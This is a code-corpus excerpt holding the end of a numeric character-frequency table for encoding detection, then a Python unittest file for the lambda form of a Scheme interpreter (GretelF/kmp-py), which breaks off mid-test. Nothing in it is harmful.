2116,1659,2018,1880, 255,3586,3314,1110,2867,2137,2564, 986,2767,5185,2006, 650,
158, 926, 762, 881,3157,2717,2362,3587, 306,3690,3245,1542,3077,2427,1691,2478,
2118,2985,3490,2438, 539,2305, 983, 129,1754, 355,4201,2386, 827,2923, 104,1773,
2838,2771, 411,2905,3919, 376, 767, 122,1114, 828,2422,1817,3506, 266,3460,1007,
1609,4998, 945,2612,4429,2274, 726,1247,1964,2914,2199,2070,4002,4108, 657,3323,
1422, 579, 455,2764,4737,1222,2895,1670, 824,1223,1487,2525, 558, 861,3080, 598,
2659,2515,1967, 752,2583,2376,2214,4180, 977, 704,2464,4999,2622,4109,1210,2961,
819,1541, 142,2284, 44, 418, 457,1126,3730,4347,4626,1644,1876,3671,1864, 302,
1063,5694, 624, 723,1984,3745,1314,1676,2488,1610,1449,3558,3569,2166,2098, 409,
1011,2325,3704,2306, 818,1732,1383,1824,1844,3757, 999,2705,3497,1216,1423,2683,
2426,2954,2501,2726,2229,1475,2554,5064,1971,1794,1666,2014,1343, 783, 724, 191,
2434,1354,2220,5065,1763,2752,2472,4152, 131, 175,2885,3434, 92,1466,4920,2616,
3871,3872,3866, 128,1551,1632, 669,1854,3682,4691,4125,1230, 188,2973,3290,1302,
1213, 560,3266, 917, 763,3909,3249,1760, 868,1958, 764,1782,2097, 145,2277,3774,
4462, 64,1491,3062, 971,2132,3606,2442, 221,1226,1617, 218, 323,1185,3207,3147,
571, 619,1473,1005,1744,2281, 449,1887,2396,3685, 275, 375,3816,1743,3844,3731,
845,1983,2350,4210,1377, 773, 967,3499,3052,3743,2725,4007,1697,1022,3943,1464,
3264,2855,2722,1952,1029,2839,2467, 84,4383,2215, 820,1391,2015,2448,3672, 377,
1948,2168, 797,2545,3536,2578,2645, 94,2874,1678, 405,1259,3071, 771, 546,1315,
470,1243,3083, 895,2468, 981, 969,2037, 846,4181, 653,1276,2928, 14,2594, 557,
3007,2474, 156, 902,1338,1740,2574, 537,2518, 973,2282,2216,2433,1928, 138,2903,
1293,2631,1612, 646,3457, 839,2935, 111, 496,2191,2847, 589,3186, 149,3994,2060,
4031,2641,4067,3145,1870, 37,3597,2136,1025,2051,3009,3383,3549,1121,1016,3261,
1301, 251,2446,2599,2153, 872,3246, 637, 334,3705, 831, 884, 921,3065,3140,4092,
2198,1944, 246,2964, 108,2045,1152,1921,2308,1031, 203,3173,4170,1907,3890, 810,
1401,2003,1690, 506, 647,1242,2828,1761,1649,3208,2249,1589,3709,2931,5156,1708,
498, 666,2613, 834,3817,1231, 184,2851,1124, 883,3197,2261,3710,1765,1553,2658,
1178,2639,2351, 93,1193, 942,2538,2141,4402, 235,1821, 870,1591,2192,1709,1871,
3341,1618,4126,2595,2334, 603, 651, 69, 701, 268,2662,3411,2555,1380,1606, 503,
448, 254,2371,2646, 574,1187,2309,1770, 322,2235,1292,1801, 305, 566,1133, 229,
2067,2057, 706, 167, 483,2002,2672,3295,1820,3561,3067, 316, 378,2746,3452,1112,
136,1981, 507,1651,2917,1117, 285,4591, 182,2580,3522,1304, 335,3303,1835,2504,
1795,1792,2248, 674,1018,2106,2449,1857,2292,2845, 976,3047,1781,2600,2727,1389,
1281, 52,3152, 153, 265,3950, 672,3485,3951,4463, 430,1183, 365, 278,2169, 27,
1407,1336,2304, 209,1340,1730,2202,1852,2403,2883, 979,1737,1062, 631,2829,2542,
3876,2592, 825,2086,2226,3048,3625, 352,1417,3724, 542, 991, 431,1351,3938,1861,
2294, 826,1361,2927,3142,3503,1738, 463,2462,2723, 582,1916,1595,2808, 400,3845,
3891,2868,3621,2254, 58,2492,1123, 910,2160,2614,1372,1603,1196,1072,3385,1700,
3267,1980, 696, 480,2430, 920, 799,1570,2920,1951,2041,4047,2540,1321,4223,2469,
3562,2228,1271,2602, 401,2833,3351,2575,5157, 907,2312,1256, 410, 263,3507,1582,
996, 678,1849,2316,1480, 908,3545,2237, 703,2322, 667,1826,2849,1531,2604,2999,
2407,3146,2151,2630,1786,3711, 469,3542, 497,3899,2409, 858, 837,4446,3393,1274,
786, 620,1845,2001,3311, 484, 308,3367,1204,1815,3691,2332,1532,2557,1842,2020,
2724,1927,2333,4440, 567, 22,1673,2728,4475,1987,1858,1144,1597, 101,1832,3601,
12, 974,3783,4391, 951,1412, 1,3720, 453,4608,4041, 528,1041,1027,3230,2628,
1129, 875,1051,3291,1203,2262,1069,2860,2799,2149,2615,3278, 144,1758,3040, 31,
475,1680, 366,2685,3184, 311,1642,4008,2466,5036,1593,1493,2809, 216,1420,1668,
233, 304,2128,3284, 232,1429,1768,1040,2008,3407,2740,2967,2543, 242,2133, 778,
1565,2022,2620, 505,2189,2756,1098,2273, 372,1614, 708, 553,2846,2094,2278, 169,
3626,2835,4161, 228,2674,3165, 809,1454,1309, 466,1705,1095, 900,3423, 880,2667,
3751,5258,2317,3109,2571,4317,2766,1503,1342, 866,4447,1118, 63,2076, 314,1881,
1348,1061, 172, 978,3515,1747, 532, 511,3970, 6, 601, 905,2699,3300,1751, 276,
1467,3725,2668, 65,4239,2544,2779,2556,1604, 578,2451,1802, 992,2331,2624,1320,
3446, 713,1513,1013, 103,2786,2447,1661, 886,1702, 916, 654,3574,2031,1556, 751,
2178,2821,2179,1498,1538,2176, 271, 914,2251,2080,1325, 638,1953,2937,3877,2432,
2754, 95,3265,1716, 260,1227,4083, 775, 106,1357,3254, 426,1607, 555,2480, 772,
1985, 244,2546, 474, 495,1046,2611,1851,2061, 71,2089,1675,2590, 742,3758,2843,
3222,1433, 267,2180,2576,2826,2233,2092,3913,2435, 956,1745,3075, 856,2113,1116,
451, 3,1988,2896,1398, 993,2463,1878,2049,1341,2718,2721,2870,2108, 712,2904,
4363,2753,2324, 277,2872,2349,2649, 384, 987, 435, 691,3000, 922, 164,3939, 652,
1500,1184,4153,2482,3373,2165,4848,2335,3775,3508,3154,2806,2830,1554,2102,1664,
2530,1434,2408, 893,1547,2623,3447,2832,2242,2532,3169,2856,3223,2078, 49,3770,
3469, 462, 318, 656,2259,3250,3069, 679,1629,2758, 344,1138,1104,3120,1836,1283,
3115,2154,1437,4448, 934, 759,1999, 794,2862,1038, 533,2560,1722,2342, 855,2626,
1197,1663,4476,3127, 85,4240,2528, 25,1111,1181,3673, 407,3470,4561,2679,2713,
768,1925,2841,3986,1544,1165, 932, 373,1240,2146,1930,2673, 721,4766, 354,4333,
391,2963, 187, 61,3364,1442,1102, 330,1940,1767, 341,3809,4118, 393,2496,2062,
2211, 105, 331, 300, 439, 913,1332, 626, 379,3304,1557, 328, 689,3952, 309,1555,
931, 317,2517,3027, 325, 569, 686,2107,3084, 60,1042,1333,2794, 264,3177,4014,
1628, 258,3712, 7,4464,1176,1043,1778, 683, 114,1975, 78,1492, 383,1886, 510,
386, 645,5291,2891,2069,3305,4138,3867,2939,2603,2493,1935,1066,1848,3588,1015,
1282,1289,4609, 697,1453,3044,2666,3611,1856,2412, 54, 719,1330, 568,3778,2459,
1748, 788, 492, 551,1191,1000, 488,3394,3763, 282,1799, 348,2016,1523,3155,2390,
1049, 382,2019,1788,1170, 729,2968,3523, 897,3926,2785,2938,3292, 350,2319,3238,
1718,1717,2655,3453,3143,4465, 161,2889,2980,2009,1421, 56,1908,1640,2387,2232,
1917,1874,2477,4921, 148, 83,3438, 592,4245,2882,1822,1055, 741, 115,1496,1624,
381,1638,4592,1020, 516,3214, 458, 947,4575,1432, 211,1514,2926,1865,2142, 189,
852,1221,1400,1486, 882,2299,4036, 351, 28,1122, 700,6479,6480,6481,6482,6483, # last 512
#Everything below is of no interest for detection purpose
5508,6484,3900,3414,3974,4441,4024,3537,4037,5628,5099,3633,6485,3148,6486,3636,
5509,3257,5510,5973,5445,5872,4941,4403,3174,4627,5873,6276,2286,4230,5446,5874,
5122,6102,6103,4162,5447,5123,5323,4849,6277,3980,3851,5066,4246,5774,5067,6278,
3001,2807,5695,3346,5775,5974,5158,5448,6487,5975,5976,5776,3598,6279,5696,4806,
4211,4154,6280,6488,6489,6490,6281,4212,5037,3374,4171,6491,4562,4807,4722,4827,
5977,6104,4532,4079,5159,5324,5160,4404,3858,5359,5875,3975,4288,4610,3486,4512,
5325,3893,5360,6282,6283,5560,2522,4231,5978,5186,5449,2569,3878,6284,5401,3578,
4415,6285,4656,5124,5979,2506,4247,4449,3219,3417,4334,4969,4329,6492,4576,4828,
4172,4416,4829,5402,6286,3927,3852,5361,4369,4830,4477,4867,5876,4173,6493,6105,
4657,6287,6106,5877,5450,6494,4155,4868,5451,3700,5629,4384,6288,6289,5878,3189,
4881,6107,6290,6495,4513,6496,4692,4515,4723,5100,3356,6497,6291,3810,4080,5561,
3570,4430,5980,6498,4355,5697,6499,4724,6108,6109,3764,4050,5038,5879,4093,3226,
6292,5068,5217,4693,3342,5630,3504,4831,4377,4466,4309,5698,4431,5777,6293,5778,
4272,3706,6110,5326,3752,4676,5327,4273,5403,4767,5631,6500,5699,5880,3475,5039,
6294,5562,5125,4348,4301,4482,4068,5126,4593,5700,3380,3462,5981,5563,3824,5404,
4970,5511,3825,4738,6295,6501,5452,4516,6111,5881,5564,6502,6296,5982,6503,4213,
4163,3454,6504,6112,4009,4450,6113,4658,6297,6114,3035,6505,6115,3995,4904,4739,
4563,4942,4110,5040,3661,3928,5362,3674,6506,5292,3612,4791,5565,4149,5983,5328,
5259,5021,4725,4577,4564,4517,4364,6298,5405,4578,5260,4594,4156,4157,5453,3592,
3491,6507,5127,5512,4709,4922,5984,5701,4726,4289,6508,4015,6116,5128,4628,3424,
4241,5779,6299,4905,6509,6510,5454,5702,5780,6300,4365,4923,3971,6511,5161,3270,
3158,5985,4100, 867,5129,5703,6117,5363,3695,3301,5513,4467,6118,6512,5455,4232,
4242,4629,6513,3959,4478,6514,5514,5329,5986,4850,5162,5566,3846,4694,6119,5456,
4869,5781,3779,6301,5704,5987,5515,4710,6302,5882,6120,4392,5364,5705,6515,6121,
6516,6517,3736,5988,5457,5989,4695,2457,5883,4551,5782,6303,6304,6305,5130,4971,
6122,5163,6123,4870,3263,5365,3150,4871,6518,6306,5783,5069,5706,3513,3498,4409,
5330,5632,5366,5458,5459,3991,5990,4502,3324,5991,5784,3696,4518,5633,4119,6519,
4630,5634,4417,5707,4832,5992,3418,6124,5993,5567,4768,5218,6520,4595,3458,5367,
6125,5635,6126,4202,6521,4740,4924,6307,3981,4069,4385,6308,3883,2675,4051,3834,
4302,4483,5568,5994,4972,4101,5368,6309,5164,5884,3922,6127,6522,6523,5261,5460,
5187,4164,5219,3538,5516,4111,3524,5995,6310,6311,5369,3181,3386,2484,5188,3464,
5569,3627,5708,6524,5406,5165,4677,4492,6312,4872,4851,5885,4468,5996,6313,5709,
5710,6128,2470,5886,6314,5293,4882,5785,3325,5461,5101,6129,5711,5786,6525,4906,
6526,6527,4418,5887,5712,4808,2907,3701,5713,5888,6528,3765,5636,5331,6529,6530,
3593,5889,3637,4943,3692,5714,5787,4925,6315,6130,5462,4405,6131,6132,6316,5262,
6531,6532,5715,3859,5716,5070,4696,5102,3929,5788,3987,4792,5997,6533,6534,3920,
4809,5000,5998,6535,2974,5370,6317,5189,5263,5717,3826,6536,3953,5001,4883,3190,
5463,5890,4973,5999,4741,6133,6134,3607,5570,6000,4711,3362,3630,4552,5041,6318,
6001,2950,2953,5637,4646,5371,4944,6002,2044,4120,3429,6319,6537,5103,4833,6538,
6539,4884,4647,3884,6003,6004,4758,3835,5220,5789,4565,5407,6540,6135,5294,4697,
4852,6320,6321,3206,4907,6541,6322,4945,6542,6136,6543,6323,6005,4631,3519,6544,
5891,6545,5464,3784,5221,6546,5571,4659,6547,6324,6137,5190,6548,3853,6549,4016,
4834,3954,6138,5332,3827,4017,3210,3546,4469,5408,5718,3505,4648,5790,5131,5638,
5791,5465,4727,4318,6325,6326,5792,4553,4010,4698,3439,4974,3638,4335,3085,6006,
5104,5042,5166,5892,5572,6327,4356,4519,5222,5573,5333,5793,5043,6550,5639,5071,
4503,6328,6139,6551,6140,3914,3901,5372,6007,5640,4728,4793,3976,3836,4885,6552,
4127,6553,4451,4102,5002,6554,3686,5105,6555,5191,5072,5295,4611,5794,5296,6556,
5893,5264,5894,4975,5466,5265,4699,4976,4370,4056,3492,5044,4886,6557,5795,4432,
4769,4357,5467,3940,4660,4290,6141,4484,4770,4661,3992,6329,4025,4662,5022,4632,
4835,4070,5297,4663,4596,5574,5132,5409,5895,6142,4504,5192,4664,5796,5896,3885,
5575,5797,5023,4810,5798,3732,5223,4712,5298,4084,5334,5468,6143,4052,4053,4336,
4977,4794,6558,5335,4908,5576,5224,4233,5024,4128,5469,5225,4873,6008,5045,4729,
4742,4633,3675,4597,6559,5897,5133,5577,5003,5641,5719,6330,6560,3017,2382,3854,
4406,4811,6331,4393,3964,4946,6561,2420,3722,6562,4926,4378,3247,1736,4442,6332,
5134,6333,5226,3996,2918,5470,4319,4003,4598,4743,4744,4485,3785,3902,5167,5004,
5373,4394,5898,6144,4874,1793,3997,6334,4085,4214,5106,5642,4909,5799,6009,4419,
4189,3330,5899,4165,4420,5299,5720,5227,3347,6145,4081,6335,2876,3930,6146,3293,
3786,3910,3998,5900,5300,5578,2840,6563,5901,5579,6147,3531,5374,6564,6565,5580,
4759,5375,6566,6148,3559,5643,6336,6010,5517,6337,6338,5721,5902,3873,6011,6339,
6567,5518,3868,3649,5722,6568,4771,4947,6569,6149,4812,6570,2853,5471,6340,6341,
5644,4795,6342,6012,5723,6343,5724,6013,4349,6344,3160,6150,5193,4599,4514,4493,
5168,4320,6345,4927,3666,4745,5169,5903,5005,4928,6346,5725,6014,4730,4203,5046,
4948,3395,5170,6015,4150,6016,5726,5519,6347,5047,3550,6151,6348,4197,4310,5904,
6571,5581,2965,6152,4978,3960,4291,5135,6572,5301,5727,4129,4026,5905,4853,5728,
5472,6153,6349,4533,2700,4505,5336,4678,3583,5073,2994,4486,3043,4554,5520,6350,
6017,5800,4487,6351,3931,4103,5376,6352,4011,4321,4311,4190,5136,6018,3988,3233,
4350,5906,5645,4198,6573,5107,3432,4191,3435,5582,6574,4139,5410,6353,5411,3944,
5583,5074,3198,6575,6354,4358,6576,5302,4600,5584,5194,5412,6577,6578,5585,5413,
5303,4248,5414,3879,4433,6579,4479,5025,4854,5415,6355,4760,4772,3683,2978,4700,
3797,4452,3965,3932,3721,4910,5801,6580,5195,3551,5907,3221,3471,3029,6019,3999,
5908,5909,5266,5267,3444,3023,3828,3170,4796,5646,4979,4259,6356,5647,5337,3694,
6357,5648,5338,4520,4322,5802,3031,3759,4071,6020,5586,4836,4386,5048,6581,3571,
4679,4174,4949,6154,4813,3787,3402,3822,3958,3215,3552,5268,4387,3933,4950,4359,
6021,5910,5075,3579,6358,4234,4566,5521,6359,3613,5049,6022,5911,3375,3702,3178,
4911,5339,4521,6582,6583,4395,3087,3811,5377,6023,6360,6155,4027,5171,5649,4421,
4249,2804,6584,2270,6585,4000,4235,3045,6156,5137,5729,4140,4312,3886,6361,4330,
6157,4215,6158,3500,3676,4929,4331,3713,4930,5912,4265,3776,3368,5587,4470,4855,
3038,4980,3631,6159,6160,4132,4680,6161,6362,3923,4379,5588,4255,6586,4121,6587,
6363,4649,6364,3288,4773,4774,6162,6024,6365,3543,6588,4274,3107,3737,5050,5803,
4797,4522,5589,5051,5730,3714,4887,5378,4001,4523,6163,5026,5522,4701,4175,2791,
3760,6589,5473,4224,4133,3847,4814,4815,4775,3259,5416,6590,2738,6164,6025,5304,
3733,5076,5650,4816,5590,6591,6165,6592,3934,5269,6593,3396,5340,6594,5804,3445,
3602,4042,4488,5731,5732,3525,5591,4601,5196,6166,6026,5172,3642,4612,3202,4506,
4798,6366,3818,5108,4303,5138,5139,4776,3332,4304,2915,3415,4434,5077,5109,4856,
2879,5305,4817,6595,5913,3104,3144,3903,4634,5341,3133,5110,5651,5805,6167,4057,
5592,2945,4371,5593,6596,3474,4182,6367,6597,6168,4507,4279,6598,2822,6599,4777,
4713,5594,3829,6169,3887,5417,6170,3653,5474,6368,4216,2971,5228,3790,4579,6369,
5733,6600,6601,4951,4746,4555,6602,5418,5475,6027,3400,4665,5806,6171,4799,6028,
5052,6172,3343,4800,4747,5006,6370,4556,4217,5476,4396,5229,5379,5477,3839,5914,
5652,5807,4714,3068,4635,5808,6173,5342,4192,5078,5419,5523,5734,6174,4557,6175,
4602,6371,6176,6603,5809,6372,5735,4260,3869,5111,5230,6029,5112,6177,3126,4681,
5524,5915,2706,3563,4748,3130,6178,4018,5525,6604,6605,5478,4012,4837,6606,4534,
4193,5810,4857,3615,5479,6030,4082,3697,3539,4086,5270,3662,4508,4931,5916,4912,
5811,5027,3888,6607,4397,3527,3302,3798,2775,2921,2637,3966,4122,4388,4028,4054,
1633,4858,5079,3024,5007,3982,3412,5736,6608,3426,3236,5595,3030,6179,3427,3336,
3279,3110,6373,3874,3039,5080,5917,5140,4489,3119,6374,5812,3405,4494,6031,4666,
4141,6180,4166,6032,5813,4981,6609,5081,4422,4982,4112,3915,5653,3296,3983,6375,
4266,4410,5654,6610,6181,3436,5082,6611,5380,6033,3819,5596,4535,5231,5306,5113,
6612,4952,5918,4275,3113,6613,6376,6182,6183,5814,3073,4731,4838,5008,3831,6614,
4888,3090,3848,4280,5526,5232,3014,5655,5009,5737,5420,5527,6615,5815,5343,5173,
5381,4818,6616,3151,4953,6617,5738,2796,3204,4360,2989,4281,5739,5174,5421,5197,
3132,5141,3849,5142,5528,5083,3799,3904,4839,5480,2880,4495,3448,6377,6184,5271,
5919,3771,3193,6034,6035,5920,5010,6036,5597,6037,6378,6038,3106,5422,6618,5423,
5424,4142,6619,4889,5084,4890,4313,5740,6620,3437,5175,5307,5816,4199,5198,5529,
5817,5199,5656,4913,5028,5344,3850,6185,2955,5272,5011,5818,4567,4580,5029,5921,
3616,5233,6621,6622,6186,4176,6039,6379,6380,3352,5200,5273,2908,5598,5234,3837,
5308,6623,6624,5819,4496,4323,5309,5201,6625,6626,4983,3194,3838,4167,5530,5922,
5274,6381,6382,3860,3861,5599,3333,4292,4509,6383,3553,5481,5820,5531,4778,6187,
3955,3956,4324,4389,4218,3945,4325,3397,2681,5923,4779,5085,4019,5482,4891,5382,
5383,6040,4682,3425,5275,4094,6627,5310,3015,5483,5657,4398,5924,3168,4819,6628,
5925,6629,5532,4932,4613,6041,6630,4636,6384,4780,4204,5658,4423,5821,3989,4683,
5822,6385,4954,6631,5345,6188,5425,5012,5384,3894,6386,4490,4104,6632,5741,5053,
6633,5823,5926,5659,5660,5927,6634,5235,5742,5824,4840,4933,4820,6387,4859,5928,
4955,6388,4143,3584,5825,5346,5013,6635,5661,6389,5014,5484,5743,4337,5176,5662,
6390,2836,6391,3268,6392,6636,6042,5236,6637,4158,6638,5744,5663,4471,5347,3663,
4123,5143,4293,3895,6639,6640,5311,5929,5826,3800,6189,6393,6190,5664,5348,3554,
3594,4749,4603,6641,5385,4801,6043,5827,4183,6642,5312,5426,4761,6394,5665,6191,
4715,2669,6643,6644,5533,3185,5427,5086,5930,5931,5386,6192,6044,6645,4781,4013,
5745,4282,4435,5534,4390,4267,6045,5746,4984,6046,2743,6193,3501,4087,5485,5932,
5428,4184,4095,5747,4061,5054,3058,3862,5933,5600,6646,5144,3618,6395,3131,5055,
5313,6396,4650,4956,3855,6194,3896,5202,4985,4029,4225,6195,6647,5828,5486,5829,
3589,3002,6648,6397,4782,5276,6649,6196,6650,4105,3803,4043,5237,5830,6398,4096,
3643,6399,3528,6651,4453,3315,4637,6652,3984,6197,5535,3182,3339,6653,3096,2660,
6400,6654,3449,5934,4250,4236,6047,6401,5831,6655,5487,3753,4062,5832,6198,6199,
6656,3766,6657,3403,4667,6048,6658,4338,2897,5833,3880,2797,3780,4326,6659,5748,
5015,6660,5387,4351,5601,4411,6661,3654,4424,5935,4339,4072,5277,4568,5536,6402,
6662,5238,6663,5349,5203,6200,5204,6201,5145,4536,5016,5056,4762,5834,4399,4957,
6202,6403,5666,5749,6664,4340,6665,5936,5177,5667,6666,6667,3459,4668,6404,6668,
6669,4543,6203,6670,4276,6405,4480,5537,6671,4614,5205,5668,6672,3348,2193,4763,
6406,6204,5937,5602,4177,5669,3419,6673,4020,6205,4443,4569,5388,3715,3639,6407,
6049,4058,6206,6674,5938,4544,6050,4185,4294,4841,4651,4615,5488,6207,6408,6051,
5178,3241,3509,5835,6208,4958,5836,4341,5489,5278,6209,2823,5538,5350,5206,5429,
6675,4638,4875,4073,3516,4684,4914,4860,5939,5603,5389,6052,5057,3237,5490,3791,
6676,6409,6677,4821,4915,4106,5351,5058,4243,5539,4244,5604,4842,4916,5239,3028,
3716,5837,5114,5605,5390,5940,5430,6210,4332,6678,5540,4732,3667,3840,6053,4305,
3408,5670,5541,6410,2744,5240,5750,6679,3234,5606,6680,5607,5671,3608,4283,4159,
4400,5352,4783,6681,6411,6682,4491,4802,6211,6412,5941,6413,6414,5542,5751,6683,
4669,3734,5942,6684,6415,5943,5059,3328,4670,4144,4268,6685,6686,6687,6688,4372,
3603,6689,5944,5491,4373,3440,6416,5543,4784,4822,5608,3792,4616,5838,5672,3514,
5391,6417,4892,6690,4639,6691,6054,5673,5839,6055,6692,6056,5392,6212,4038,5544,
5674,4497,6057,6693,5840,4284,5675,4021,4545,5609,6418,4454,6419,6213,4113,4472,
5314,3738,5087,5279,4074,5610,4959,4063,3179,4750,6058,6420,6214,3476,4498,4716,
5431,4960,4685,6215,5241,6694,6421,6216,6695,5841,5945,6422,3748,5946,5179,3905,
5752,5545,5947,4374,6217,4455,6423,4412,6218,4803,5353,6696,3832,5280,6219,4327,
4702,6220,6221,6059,4652,5432,6424,3749,4751,6425,5753,4986,5393,4917,5948,5030,
5754,4861,4733,6426,4703,6697,6222,4671,5949,4546,4961,5180,6223,5031,3316,5281,
6698,4862,4295,4934,5207,3644,6427,5842,5950,6428,6429,4570,5843,5282,6430,6224,
5088,3239,6060,6699,5844,5755,6061,6431,2701,5546,6432,5115,5676,4039,3993,3327,
4752,4425,5315,6433,3941,6434,5677,4617,4604,3074,4581,6225,5433,6435,6226,6062,
4823,5756,5116,6227,3717,5678,4717,5845,6436,5679,5846,6063,5847,6064,3977,3354,
6437,3863,5117,6228,5547,5394,4499,4524,6229,4605,6230,4306,4500,6700,5951,6065,
3693,5952,5089,4366,4918,6701,6231,5548,6232,6702,6438,4704,5434,6703,6704,5953,
4168,6705,5680,3420,6706,5242,4407,6066,3812,5757,5090,5954,4672,4525,3481,5681,
4618,5395,5354,5316,5955,6439,4962,6707,4526,6440,3465,4673,6067,6441,5682,6708,
5435,5492,5758,5683,4619,4571,4674,4804,4893,4686,5493,4753,6233,6068,4269,6442,
6234,5032,4705,5146,5243,5208,5848,6235,6443,4963,5033,4640,4226,6236,5849,3387,
6444,6445,4436,4437,5850,4843,5494,4785,4894,6709,4361,6710,5091,5956,3331,6237,
4987,5549,6069,6711,4342,3517,4473,5317,6070,6712,6071,4706,6446,5017,5355,6713,
6714,4988,5436,6447,4734,5759,6715,4735,4547,4456,4754,6448,5851,6449,6450,3547,
5852,5318,6451,6452,5092,4205,6716,6238,4620,4219,5611,6239,6072,4481,5760,5957,
5958,4059,6240,6453,4227,4537,6241,5761,4030,4186,5244,5209,3761,4457,4876,3337,
5495,5181,6242,5959,5319,5612,5684,5853,3493,5854,6073,4169,5613,5147,4895,6074,
5210,6717,5182,6718,3830,6243,2798,3841,6075,6244,5855,5614,3604,4606,5496,5685,
5118,5356,6719,6454,5960,5357,5961,6720,4145,3935,4621,5119,5962,4261,6721,6455,
4786,5963,4375,4582,6245,6246,6247,6076,5437,4877,5856,3376,4380,6248,4160,6722,
5148,6456,5211,6457,6723,4718,6458,6724,6249,5358,4044,3297,6459,6250,5857,5615,
5497,5245,6460,5498,6725,6251,6252,5550,3793,5499,2959,5396,6461,6462,4572,5093,
5500,5964,3806,4146,6463,4426,5762,5858,6077,6253,4755,3967,4220,5965,6254,4989,
5501,6464,4352,6726,6078,4764,2290,5246,3906,5438,5283,3767,4964,2861,5763,5094,
6255,6256,4622,5616,5859,5860,4707,6727,4285,4708,4824,5617,6257,5551,4787,5212,
4965,4935,4687,6465,6728,6466,5686,6079,3494,4413,2995,5247,5966,5618,6729,5967,
5764,5765,5687,5502,6730,6731,6080,5397,6467,4990,6258,6732,4538,5060,5619,6733,
4719,5688,5439,5018,5149,5284,5503,6734,6081,4607,6259,5120,3645,5861,4583,6260,
4584,4675,5620,4098,5440,6261,4863,2379,3306,4585,5552,5689,4586,5285,6735,4864,
6736,5286,6082,6737,4623,3010,4788,4381,4558,5621,4587,4896,3698,3161,5248,4353,
4045,6262,3754,5183,4588,6738,6263,6739,6740,5622,3936,6741,6468,6742,6264,5095,
6469,4991,5968,6743,4992,6744,6083,4897,6745,4256,5766,4307,3108,3968,4444,5287,
3889,4343,6084,4510,6085,4559,6086,4898,5969,6746,5623,5061,4919,5249,5250,5504,
5441,6265,5320,4878,3242,5862,5251,3428,6087,6747,4237,5624,5442,6266,5553,4539,
6748,2585,3533,5398,4262,6088,5150,4736,4438,6089,6267,5505,4966,6749,6268,6750,
6269,5288,5554,3650,6090,6091,4624,6092,5690,6751,5863,4270,5691,4277,5555,5864,
6752,5692,4720,4865,6470,5151,4688,4825,6753,3094,6754,6471,3235,4653,6755,5213,
5399,6756,3201,4589,5865,4967,6472,5866,6473,5019,3016,6757,5321,4756,3957,4573,
6093,4993,5767,4721,6474,6758,5625,6759,4458,6475,6270,6760,5556,4994,5214,5252,
6271,3875,5768,6094,5034,5506,4376,5769,6761,2120,6476,5253,5770,6762,5771,5970,
3990,5971,5557,5558,5772,6477,6095,2787,4641,5972,5121,6096,6097,6272,6763,3703,
5867,5507,6273,4206,6274,4789,6098,6764,3619,3646,3833,3804,2394,3788,4936,3978,
4866,4899,6099,6100,5559,6478,6765,3599,5868,6101,5869,5870,6275,6766,4527,6767)
| mit |
GretelF/kmp-py | interpreter/unittests/test_lambda.py | 1 | 5215 | from interpreter.kmp_py import reader, evaluator,schemeExceptions, initialize
from interpreter.kmp_py.scheme import *
from unittest import TestCase
# Initialize the global environments and add the initial bindings to
# globalEnv and syntaxEnv. This must run at import time, before any test
# parses or evaluates scheme source via eval_string()/call_lambda().
initialize.initialize()
def call_lambda(lambdaObject, args='', env=None):
    """Apply *lambdaObject* to the arguments given in the string *args*.

    *args* is a space-separated scheme source string (e.g. '1 2 3'); it is
    wrapped in parentheses, read back into a scheme list and consed onto
    the lambda to form the application, which is then evaluated in *env*
    (the global environment by default).
    """
    if env is None:
        env = evaluator.SchemeEvaluator.globalEnv
    schemeEvaluator = evaluator.SchemeEvaluator()
    schemeReader = reader.SchemeReader()
    argList = schemeReader.read(SchemeStringStream('({0})'.format(args)))
    application = SchemeCons(lambdaObject, argList)
    return schemeEvaluator.evaluate(application, env)
def eval_string(string, env=None):
    """Read the scheme source *string* and evaluate it in *env*.

    The environment now defaults to None and is resolved at call time,
    matching the late-binding pattern already used by call_lambda(). The
    previous default (``env=evaluator.SchemeEvaluator.globalEnv``) was
    evaluated once at import; if initialize.initialize() rebinds
    SchemeEvaluator.globalEnv (tests call it repeatedly), the old default
    would keep evaluating against a stale environment.
    """
    if env is None:
        env = evaluator.SchemeEvaluator.globalEnv
    r = reader.SchemeReader()
    e = evaluator.SchemeEvaluator()
    obj = r.read(SchemeStringStream(string))
    return e.evaluate(obj, env)
class test_Lambdas(TestCase):
    """End-to-end tests for the `lambda` special form of the interpreter.

    Every test drives the interpreter through eval_string()/call_lambda(),
    i.e. parses scheme source strings and evaluates them against the
    global environment created by initialize.initialize().
    """
    def test_lambda_create(self):
        """lambda evaluates to a user-defined function carrying arglist and body."""
        obj = eval_string('(lambda () 1)')
        self.assertIsNotNone(obj, 'syntax lambda should not return None')
        self.assertEqual(obj.type, 'schemeUserDefinedFunction', 'syntax lambda should return a userdefined function.')
        obj2 = eval_string('(lambda (a b c) 1 2 3)')
        self.assertEqual(obj2.arglist, [SchemeSymbol('a'), SchemeSymbol('b'), SchemeSymbol('c')], 'lambda should have arglist [a,b,c]')
        self.assertEqual(obj2.bodylist,[SchemeNumber(1), SchemeNumber(2), SchemeNumber(3)], 'lambda should have body [1, 2, 3]' )
    def test_lambda_tooFewArguments(self):
        """lambda with fewer than two arguments raises ArgumentCountException."""
        self.assertRaises(schemeExceptions.ArgumentCountException, eval_string, '(lambda x)')
        self.assertRaises(schemeExceptions.ArgumentCountException, eval_string, '(lambda)')
    def test_lambda_firstArgumentNoCons(self):
        """The parameter list of a lambda must be a cons, not an atom."""
        self.assertRaises(schemeExceptions.ArgumentTypeException, eval_string, '(lambda 1 2)')
    def test_lambda_name(self):
        """define names an anonymous lambda once; aliasing keeps the first name."""
        eval_string('(define f (lambda () 1))')
        obj = eval_string('f')
        self.assertEqual(obj.name, 'f', 'define did not set the name of the lambda.')
        eval_string('(define g f)')
        obj2 = eval_string('g')
        self.assertEqual(obj2.name, obj.name, 'define should not reset the name of the lambda.')
    def test_lambda_call(self):
        """Calling a nullary lambda returns its body's value."""
        lambdaObject = eval_string('(lambda () 1)')
        obj = call_lambda(lambdaObject) # call with no arguments
        self.assertEqual(obj.type, 'schemeNumber', 'the lambda should return a type schemeNumber')
        self.assertEqual(obj.value, 1, 'the lambda should return schemeNumber 1')
    def test_lambda_call_returnLambdaArgument(self):
        """The identity lambda returns exactly the object it was passed."""
        lambdaObject = eval_string('(lambda (n) n)')
        obj = call_lambda(lambdaObject, '10') # call with argument 10
        self.assertEqual(obj.type, 'schemeNumber', 'the lambda should return the type of the object, that was passed as argument')
        self.assertEqual(obj.value, 10, '10 was passed as argument, so schemeNumber 10 should be returned.')
    def test_lambda_call_tooManyArguments(self):
        """Passing more arguments than parameters raises ArgumentCountException."""
